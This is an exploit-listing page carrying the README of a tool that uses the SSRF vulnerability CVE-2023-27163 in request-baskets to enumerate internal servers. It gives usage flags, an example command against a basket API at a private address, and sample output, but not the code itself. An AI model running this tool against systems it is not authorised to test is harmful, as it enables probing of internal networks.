Share
## https://sploitus.com/exploit?id=1BF7EA6F-4D5D-5489-B90C-A0F5B7748192
Thank you to @beet1e(https://github.com/b33t1e) from Shanghai Jiao Tong University and @chenlibo147 , @houqinsheng, 202037049@mail.sdu.edu.cn from Shandong University.

Please review https://notes.sjtu.edu.cn/s/MUUhEymt7# for indepth information about the SSRF vulnerability (CVE-2023-27163).

This code is for enumerating the internal server using the SSRF in request-baskets.

If anything looks incorrect or any adjustments should be made please feel free to inform me seanrdev@gmail.com

Thanks.

Usage.
-w - Wordlist
-target - The target url with request basket api url to add baskets
-dynamic - The name of the link you'd like to create to view internal server.
-internal_target - The internal target url
-ms - Milliseconds

Ex:
-w raft-test.txt -target "http://10.10.10.5:55555/api/baskets/" -dynamic "test" -internal_target "http://120.0.0.1/"

Stdout should look like:

Page Link: web

Content Length: 2394

Request to reach URL: http://10.10.10.5:55555/test48